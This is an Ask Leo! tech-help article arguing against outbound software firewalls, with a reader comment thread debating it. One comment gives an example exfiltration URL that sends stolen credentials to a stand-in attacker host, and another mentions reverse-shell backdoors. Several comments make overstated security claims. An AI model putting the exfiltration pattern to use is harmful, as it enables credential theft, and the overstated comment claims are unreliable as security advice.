You have said that when an outbound firewall stops something it is already too late. But don’t you think outbound firewall might stop a key logger from at least sending logs to an email or remote computer? Or would it not?
A firewall with outbound detection can be of use, but you’ve captured my thoughts already: if it detects something, in a way it’s already too late: your machine is infected.
Let’s review what outbound firewalls are, why I rarely recommend them, and perhaps why your key logger wasn’t detected.
Become a Patron of Ask Leo! and go ad-free!
Firewalls
Firewalls protect you from certain classes of bad things out on the internet. The primary function of a firewall is to monitor traffic coming from the internet (inbound) and prevent bad stuff from reaching or affecting your computer.
Its job is to protect you from “them”, where “them” means the bad guys on the internet.
My article Do I need a firewall, and if so, what kind? has a good overview of firewalls in general, how they do what they do, and my recommended approach.
To summarize: my preference is to use a hardware device, such as a router with NAT (Network Address Translation) enabled. This does an incredibly effective job of hiding your computer from outside access. You can connect out, but outside computers cannot initiate a connection without you having explicitly configured your router to allow it.
Using a router also takes the burden of that work off your computer. In fact, a single router can act as a single effective inbound firewall for all computers connected behind it.
Outbound firewall
A traditional firewall monitors traffic heading toward your computer from the internet. An outbound firewall does just the opposite: it looks for threats originating on your computer attempting to connect out to the internet.
In a sense, it’s protecting “them” from you.
While it’s very generous of you to protect everyone else from your computer, the real difference is that it should block and alert you when something suspicious is happening, so you can take corrective action.
Outbound firewall shortcomings
In my opinion, outbound firewalls have several shortcomings, both technical and conceptual.
It’s too late
As you pointed out, when an outbound firewall detects something malicious, it’s because your machine is already infected. Something in your inbound security failed, and your machine very likely has malware.
Of course, it’s nice to be alerted, but your inbound defenses – firewall and anti-malware scanners – should have already either prevented or detected the problem. With adequate inbound protection, an outbound firewall is mostly redundant.
It’s intrusive
Outbound firewalls are only practically available as a part of third-party software firewalls you install on your machine. That means these firewalls take up additional resources to do their job.
A router will give you the inbound protection you need without taking up any additional resources.
It’s frequently wrong
I’d say that the most common complaints about outbound firewalls are that it throws warning messages that are either incomprehensible or overly frequent, and it doesn’t give enough information to make an informed decision about what action to take, if any.
Frequently, they simply report an outbound connection attempt, with little or no information beyond the remote IP address.
They often generate warnings arising from totally legitimate processes on the machine, accessing the internet for things like software updates, or even just the current time and date.
With too many errors, indecipherable messages and false positives, people tend to ignore all the warnings after a while, rendering the outbound firewall completely ineffective.
The case for an outbound firewall
Is there a case for an outgoing firewall at all?
Many experts will disagree with me and say they add a lot of value, and the issues I’ve raised are simply off target or overstated.
Yes, it can act as an additional warning system. If it’s not too intrusive, it might even be relatively benign.
But I remain of the opinion that if an outgoing firewall is, in fact, adding value, it’s because your incoming protection is inadequate. If you’re going to focus additional energy and resources on security, I’d much rather you focus on preventative solutions, rather than solutions that only kick in after something has happened.
Detecting your keylogger
Now, about your keylogger.
If it’s showing up in the system tray, I’m not sure I’d classify it as malware.
It’s open about what it’s doing and easily visible. A key logger isn’t of itself necessarily malware – there are many legitimate uses for the technology. Since it’s not behaving like malware, I’m not surprised it’s not detected as malware.
It also may not be reaching out to the internet. It may be storing the keystrokes it logs locally, or it may simply delay its upload of your activity until it’s collected a certain amount of data, or until some other time.
But let’s assume you did get infected by a truly malicious keylogger – one that was attempting to hide and send all your keystrokes to some overseas hacker in real time.
Well, at the risk of repeating myself too many times: it’s too late. Your machine has been compromised, and you can no longer trust it – and that includes trusting your firewall. Yes, your outbound firewall might block the transmission – or it might not. The malware could, in fact, include additional code to actually reconfigure your firewall to let the malware’s communication through.
This is almost worse than having no outbound protection at all. With the outbound firewall you might think you’re protected when in fact you are not. Without an outbound firewall, you know, and you know to focus your efforts on inbound protection to avoid the problem in the first place.
I know that others will disagree with me, and I’m sure there’ll be some compelling cases made in the comments.
But I remain unconvinced, and outbound firewalls are not something I use personally or generally advise.
Do this
Subscribe to Confident Computing! Less frustration and more confidence, solutions, answers, and tips in your inbox every week.
I'll see you there!
Wow that was quick. I see your point: if computer is infected you can’t trust it and that includes firewall on it. Focus on prevention instead.
Btw, I installed the keylogger just to check what would happen if someone else did it on my machine. Paid version of the keylogger does have the option to hide it. Free version hides it temporarily. Name of keylogger was in the mail. I suppose some keyloggers are legitimate commercial software and are specifically left out, because another keylogger with similar functionality my anti virus didn’t even let me install.
I believe that a software firewall is necessary layered security is a must in this day in age a hardware firewall is not enough. search for a blog called Melih and read his article on this point of view.
Do you have the direct link to that specific article? Because there’s like 64 of them (assuming I found the correct blog), and apparently I can’t make out which one it is without reading through ALL of them.
You do realizing you’re asking a question of someone who commented eight years ago?
Ah! I do believe you’re right! The article was conveniently linked in the most recent newsletter. My bad for not checking the date :)
I have McAfee Desktop Firewall Enterprise edition. Everytime a program in my computer tries to call his mother ship via port 6660 to 6669, McAfee Desktop Firewall will prompt if to allow or deny outbound connection. The McAfee Antivirus Enterprise edition didn’t block IRC both ways, I think outbound firewall is essential if you’re concerned about privacy.
I got infected with Virtualmonde or Trojan Vundo before. The McAfee antivirus couldn’t even totally get rid of this trojan. The McAfee Desktop Firewall came in handyuntil I got Malwarebytes Anti-Spyware that totally got rid of all sort of parasites in my destop.
I have to agree that by the time an out going firewall alerts you of a problem , you already have one.
But in some cases, that is the first ,and possibly, the only indication that you have the problem. As well they are very handy at stopping malware downloaders.
Keep in mind that a software (in/outbound) firewall has to go thru the header of EVERY SINGLE packet being sent AND received. This means it will require a variable amount of resources, depending on how you use your connection.
If you download/upload a lot of information (even if you unblocked the program), your software firewall must still spend CPU resources to read all those packet headers.
If you’re playing a game, downloading a movie, or even using your instant messenger, it will have to read EVERY SINGLE packet, going both in and out. You can expect at least 15-20% of your CPU to be used AT ALL TIMES for a heavy user.
Not to mention the fact that a user behind a NAT router (which provides inbound protection already), also running a software firewall, (which provides inbound protection again, but this time using your computer’s resources), simply makes no sense.
A NAT router alone though, takes care of the problem at it’s source, does it only 1 time, and saves you all the resources you so very need from being wasted.
Leo’s philosophy is true: If it’s already on your computer, it should be assumed that it should be, and should be left just as that.
An alternative to this, if you are somewhere with an unmanaged network, or if you are connecting to a place you don’t trust, Windows Firewall (which also only does inbound protection) will do, pretty much the same job as your NAT Router, on the road. And, since it’s inbound only, it will use less than 1/2 of the resources, your in/outbound firewall would require (5% CPU).
does it read every packet or just only every program connecting internet?
-Leo
One Exception! At the time this occurred I was 70 years old with no interest in pirating DVD’s. I had purchased and installed DVD X Copy because in the advertising it sounded as if it could be used to make multiple copies of MY HOME RECORDED videos for family members. I was given a prercorded DVD for Christmas and made the mistake of watching it on that computer. A program included on that DVD that was ostensibly a DVD player asked for permission to go out to the web. Innocently I gave it that permission. It returned immediately with a trojan That deactivated X Copy which I intended for a perfectly lawful purpose. Further it destroyed all of my personal photo files on that computer. Without the out going firewall the damage would have been done and the cause would have been a complete mystery. Obviously considering these vigilante tactics I now have no sympathy for the DVD industry and there supposed problem with piracy. D.D.
I’m with Fred on this one.
Snip: “In some cases, that is the first, and possibly the only indication, that you have a problem.”
Too right mate. If something does happen to get past your defences, what Leo is suggesting would let it do what ever the hell it likes without you ever knowing. Well, at lest till the day you find that you’ve taken out a $250k loan in another country and some debt collectors want you to pay it back!
Leo:
SNIP: “Frequently, they’ll simply report a connection attempt to or from an IP address with little or no additional information.”
Google is your friend. (-: They usually tell you the process/program name, and which folder it’s in. A legitimate process name in the wrong folder is a virus. IP lookup/whois can also give you some good clues as to the status of any outgoing connection request. It pays to be vigilant.
But there’s an even better solution to this whole problem. Use Linux! (-: No need for FWs or AVs. End of story.
Thanks for all the great newsletters and articles Leo.
Well, an advanced user may find the software firewall helpful. Suppose you have set up your PC to be accessed via VNC through the Internet via your Home NAT Router by opening specific ports. The software firewall detects numerous connection attempts per minute on those open ports giving you an oppurtunity to block them. Had it not been there & you would not have supplied a good password to VNC, you can imagine the consequences.
It becomes necessary in such cases but for the average user, yes being behind a NAT router with good browsing habits is sufficient.
Ravi.
novice, any packet, whether the program is connected to the internet or not, will be checked by the software firewall (even though it might not be going out).. The port # is located in the header of every packet. The file MUST be scanned in order to find out which program it relates to (something a software firewall must do).
Depending on if it’s set to check both incoming and outgoing packets or just 1 or the other, is the only situation where you may see a difference–Windows Firewall only checks incoming connections for example.
Leo’s way is the best/most practical way to do it. If you have a NAT router (which makes sure all unused ports are closed) & if you keep your system clean from the get-go (ie have decent virus protection — i recommend NOD32), then you never have to worry about “bad things, trying to get out”, because “bad things” will never get on. In cases like this, an outbound firewall is totally redundant..
Several popular commercial software programs are (at least arguably) spyware – some versions of a very common media player have been mentioned for example. There was no option to tell it not to send a list of the files you played back to them. An outbound firewall can protect you from this. Many antivirus or antispyware programs will not detect popular commercial software (for fear of legal liability).
Regarding “it’s too late”.
Suppose keylogger or trojan already infected computer. It’s no good, i agree. But outbound firewall *prevented* this bad thing from sending out electronic payment system details, hence made keylogger or trojan useless as it never succeeds in completing its objective – sending data to its master.
|| But lets assume that you did get infected by a truly malicious key logger – one that was attempting to hide, and send all your keystrokes to some overseas hacker. Well, at the risk of repeating myself too many times: it’s too late. Your machine has been compromised, and you can no longer trust it; and that includes trusting your firewall. Yes, your outbound firewall might block the transmission – or it might not. The malware could, in fact, include additional code to actually reconfigure your firewall to let the malware’s communication through. It’s been done. ||
You are reffering in this example to unknown vulnerable firewall software, but applying conclusions to outbound firewall in general. Is that slyness or fortuity?
Why haven’t you told anything about outbound firewall software which is guarded by Host Intrusion Prevention System (HIPS), which *prevents* malware from:
– including any code to firewall;
– reconfiguring it ;
– modifying operating system in other way in order to send data bypassing outbound firewall.
Comodo Internet Security (CIS) is example of such firewall software. Maybe there are some other firewall products out there which can do same? Pls, inform me.
|| You have said that when an outbound firewall stops something it is already too late. But don’t you think outbound firewall might stop a key logger from at least sending logs to an email or remote computer? Or would it not? ||
You substituted “outbound firewall” for unknown leaky outbound firewall software. Why?
There are real world outbound firewalls that don’t leak (i know one – CIS).
|| It’s intrusive. Outbound firewalls are only practically available as components of software firewalls that you install on your machine. As such, these firewalls take up additional resources to do their job. Rather than do that, a router will give you the inbound protection you need without taking up additional resources on your machine. ||
“Additional resources” is subjective term. For example, what is better: spend system’s additional resources (how many? :) ) OR save resources, but risk to be infected with trojan (zero day virus – anti-virus won’t detect it) that will leak electronic payment system login & password.
|| It’s frequently wrong. …With too many errors, indecipherable messages or false positives, people tend to ignore the warnings after a while, rendering the outbound firewall ineffective. ||
In some cases *people* “tend to ignore the warnings…”. But what’s wrong with outbound firewall? Lack of clarity etc. is subjective not to say more. And differs from user to user, from one firewall software to another.
|| Is there a case for an outgoing firewall at all? Many experts will disagree with me and say absolutely, that they add a lot of value and that the issues I’ve raised are simply off target or over-stated. But I remain of the opinion that if an outgoing firewall is, in fact, adding value it’s because your incoming protection is inadequate. ||
Many ordinary users may have their pc infected even with adequate incoming protection. Friend’s infected flash drive, executable from trusted source which in fact is malware, social engineering, malicious e-mail attachments.
What to do with those examples when people’s computers (those behind NAT or those part of closed enterprise networks) got infected from “inside”?
Anti-Virus-Spyware and other signature-based detection software will NOT detect malicious executables (trojans, keyloggers) if they are zero day viruses/malware (those viruses/malware, for which specific antivirus software signatures are not yet available).
as a long time member on wilders security and some one who is always testing security products with live malware I am going to make Comment.
Regarding the “it’s too late”.comment. It is not an outbound firewalls job to prevent infection from happening in the first place. An out bound firewall is designed to do just that Police all out going traffic, not prevent the installation of malware.
Yes it is possible for malware to bypass out bound firewalls. But I wouldn’t go as far as to say an outbound firewall is not needed. Going by that logic one could also argue that zero day malware can also disable and bypass Anti virus Programs so therefore it is a waste of time using an anti virus program as well.
While Router with Nat is good to have, a Router with Nat alone will not save you from getting keyloggers neither will it prevent the keylogger from making outgoing connections.
That said a lot of software outbound firewalls are improving in strength they have now added in “Host Intrusion Prevention” components to prevent the infection/installation of malware.
To sum this up it is better to have a layered security approach ie Nat Router, software firewall, AV, and a backed up Image of your OS. Rather than just using A Nat Router.
As a network consultant, my experience is that software firewalls cause much more trouble than they prevent. If a PC can’t connect to the network, can’t share resources, or has mysterious trouble connecting for some (but not all) purposes, quite often a software firewall is the culprit. It’s probably because a non-expert user has said “no” to the firewall’s prompt that something (legitimate) is trying to go in or out. Sorry, but it’s not the average user’s responsibility to be technical enough to manage a firewall.
Your major point, “it’s too late,” is flawed in at least one respect. While listening on an Incoming port generally requires Administrator access, Outgoing connections may generally be initiated by clients with User level access. If a non-administrative user were to run hostile code on the machine, it would have access to everything to which the user has access – including the ability to initiate outgoing connections; thus a backdoor with User-level access could be loaded on the infected machine and could connect back to a host machine and wait for commands. This serves as the sharp point of the wedge which can then be metaphorically driven into the infected machine through privilege escalation vulnerabilities. See this link:
http://www.plenz.com/reverseshell
I get your point, and agree with your logic, as I agree with the Catholic Church’s logic that condoms put people at risk of getting AIDS, (feel too safe and you may take risks you shouldn’t be taking).
I’m not convinced with your “It’s too late” argument. By the same standard, an AIDS test is not worth; because once you got AIDS, you’re dead. If you were infected, wouldn’t you want to know early on? If your password was stolen, wouldn’t you want to know about it so you can change it? And take corrective measures?
Even when I know that it’s not 100% secure, the outbound firewall makes me less paranoid, so I don’t have to be running tcpview and checking windows firewall’s advanced settings periodically
I now use MSE and I’m mostly happy with it. However, I miss my old F-Prot’s outbound firewall because it let me know when a “legitimate” program was trying to connect without my knowledge for the first time (yes I’m a control freak when it comes to my PC). I once had MS Media Player change the cover & tags of all my mp3s, and spent more than a month fixing them, just because I forgot to set MSMP’s options right after an upgrade. I also had other programs do nasty stuff like that, or just connect and take my bandwidth without my knowledge.
Summarizing:
-I agree that an outbound firewall may be inconvenient or dangerous for the average user (similar to giving teenagers condoms and telling them to f**k at will).
-But, they certainly have a use under certain circumstances and for certain users
– I once read something about PC security being about securing several critical points. (http://ask-leo.com/internet_safety_how_do_i_keep_my_computer_safe_on_the_internet.html) Why is another security layer a bad idea?
PS: Is there a way to make Windows Firewall behave like these firewalls asking for permission for unknown programs trying to connect to the internet? I know you can manually block applications going in or out, but how about an “ask for permission”?
I wonder how an outbound firewall is going to tag an outbound http connection to a remote machine on port 80. Suppose that my malicious key logger, sitting still on a machine until he got “user id” and “passwd” when you connected to citibank, say, and then quickly opens a connection to
http://malicious.hacker.io/dodo/?data1=123456&data2=mysecretpw ?
Typically an outbound firewall would be looking at more than just the port. For example that domain (malicious.hacker.io in your example) could be on a known black list, or its IP address could be.
In addition to Leo’s comments, and assuming you’re talking about a firewall that has an application-layer component, it’d be blocked from making any outgoing connections at all.
“Outbound firewalls are only practically available as a part of third-party software firewalls you install on your machine.” – That’s incorrect. Windows Firewall with Advanced Security enables very granular control over outbound connections.
“It’s too late.” – Not necessarily. For example, if a crypto/ransomware cannot establish a connection to its command and control servers, it cannot run its encryption routines.
Leo,
apart from Windows DEFENDER, would you, or anyone else, suggest a firewall for windows 10, to display/monitor OUTBOUND as well as inbound traffic , so I can see who my machine is trying to contact? tks&rgds
Windows Defender isn’t a firewall. The firewall built into Windows 10 provides additional options when used in “Advanced Security” mode::
https://technet.microsoft.com/en-us/library/cc754274.aspx
Most hardware firewalls can act as both inbound and outbound firewalls. I use a PIX 515E for my firewall and I can easily control both inbound and outbound connections. And, while it may be too late to stop the infection it is certainly not too late to protect yourself a bit further. Anti virus and anti malware software are falling further and further behind the curve. Any added protection is certainly welcome in my book. Yes, it is a headache to have to add rules every time I add a new game or whatever to allow it to contact the Internet. But, I’d much rather have the added headache than compromise my data, passwords, etc, etc. It’s not the perfect solution but it does add an additional layer of protection. After all, there is a reason the PCI counsel requires outbound as well as inbound filtering at the border. And I wholeheartedly agree software firewalls are mostly ineffective.
“It’s not the perfect solution but it does add an additional layer of protection.” – Yes, a properly configured firewall appliance does indeed provide an additional layer of protection. The problem is, however, that the average home user likely doesn’t have the know-how to be able to configure it properly. Additionally, if improperly configured, these devices can cause all sorts of network/connectivity problems – and troubleshooting those problems becomes more complex too.
Most folk are already behind a couple of firewalls: the one built into their router and the one built into Windows. I think that this combination is probably the best option for most home users: it strikes the right balance between security, convenience/ease of use and cost.
“And I wholeheartedly agree software firewalls are mostly ineffective.” – On the contrary, software firewalls – including the software firewall built into Windows – are very effective.
It’s not true that if an outgoing firewall detects something, “in a way it’s already too late: your machine is infected.” Your machine doesn’t have to be infected, but you may have known and useful software on your computer that decides to send out information without asking you. For example, what business does Adobe PDF Reader have to be sending out information from your computer, especially if you’ve turned off the auto-update feature? You’ll probably find that many freeware applications will send something out. The same goes with MS Office applications and Windows 10! Now an outgoing firewall can be essential to minimize Windows 10 mining data from your hard drive and sending it out to the mother ship.
I believe Leo was talking in terms of security.
“For example, what business does Adobe PDF Reader have to be sending out information from your computer, especially if you’ve turned off the auto-update feature?” – Could be any number of reasons, including the document pulling external content.
Really, if somebody has so little confidence in a company that they feel it necessary to block – or attempt to block, anyway – that company’s product from making external connection, then it’d like to better to switch to a different company’s products.
Let me add an additional comment here:
“Now an outgoing firewall can be essential to minimize Windows 10 mining data from your hard drive and sending it out to the mother ship.” – How do you know that ZoneAlarm – or whatever firewall you use – isn’t “mining data from your hard drive and sending it out to the mother ship”? I can only assume that you trust developer of the firewall more than you trust Microsoft – but this is a stance that really doesn’t make sense given that the firewall company will be subject to much less scrutiny than Microsoft: a company whose every move is put under the microscope by independent security researchers and regulators.
The bottom line is that you shouldn’t be using an application which your do not trust. Or an operating system.
Does turning off Windows firewall/ a software firewall put computers on the same router at risk? If two laptops are connected to the same WiFi: Would the router’s firewall allow the infected laptop to communicate with the good laptop and spread a virus? Or can routers block malicious inside connections in addition to outside connections? Also, is it possible the infected laptop could connect through WiFi direct to the good laptop and completely bypass any hardware firewall, without anybody realizing what’s happening? Even if me and my friend intended to connect using WiFi direct to share files, then we would have no protection from each other, allowing the good file transfer but blocking the virus transfer.
A NAT firewall which is a feature of every router is generally sufficient to protect the computers against attacks from the outside. The danger is if one of the users on the local area network does something to invite a virus, for example, running an infected program. When that happens, it can put the other computers on the LAN in danger of infection so it can protect you from a computer on your local network. As the article states: “a single router can act as a single effective inbound firewall for all computers connected behind it.” Not having a software firewall in itself won’t endanger other machines.
Routers do not protect local machines from each other — only traffic that crosses the router to and from the internet is firewalled.
IF you can’t trust a local machine for some reason, then yes, you want your local firewalls turned on. Fortunately that’s the default these days, and doesn’t impact performance adversely.